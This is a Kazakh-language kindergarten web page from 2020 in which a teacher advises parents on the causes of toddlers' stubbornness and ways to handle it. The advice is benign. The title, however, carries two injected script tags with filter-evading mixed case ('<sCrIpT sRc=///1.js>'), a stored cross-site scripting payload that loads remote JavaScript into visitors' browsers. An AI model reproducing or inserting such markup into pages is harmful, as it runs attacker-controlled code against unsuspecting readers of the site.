"Қыңырлықты қалай жеңуге болады"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.07.2020

Степногорск қаласы "Балауса" бөбекжай-балабақшасының "Гүлдер" тобының тәрбиешілерінің кеңестері

Кіші топтағы балалармен жұмыс істеу барысында баланың қыңырлық көрсету жағдайларына жиі куә боласың. Көп жағдайда олардың мұндай қылықтарының себебін білмейсің. Сондықтан ата-аналарға шағын кеңес бере кеткенді жөн көрдік.

Ең алдымен қыңырлық пен еркеліктің себебін біліп алу керек. Ондай қылықтарға мыналар себеп болуы мүмкін:

- күн режімінің бұзылуы;

- күннің әсерге толы болуы;

- науқастанудың салдарынан көңіл-күйдің болмауы;

- қатты шаршау (физикалық, психологиялық).

Қыңырлықты жою жолдары:

- Отбасының барлық мүшесі балаға бірдей талап қою керек;

- "Болмайды" деген сөздің мәнін түсіндіру;

-Үлкендердің бақылауымен немесе бірлесе отыра баланың өздігінен іс-әрекетпен айналысу дағдыларын дамыту.

 

Тәрбиеші Жижкина Н.А.

Просмотров: 726


Пікір қосу



Деректерді қолтаңбаға қосу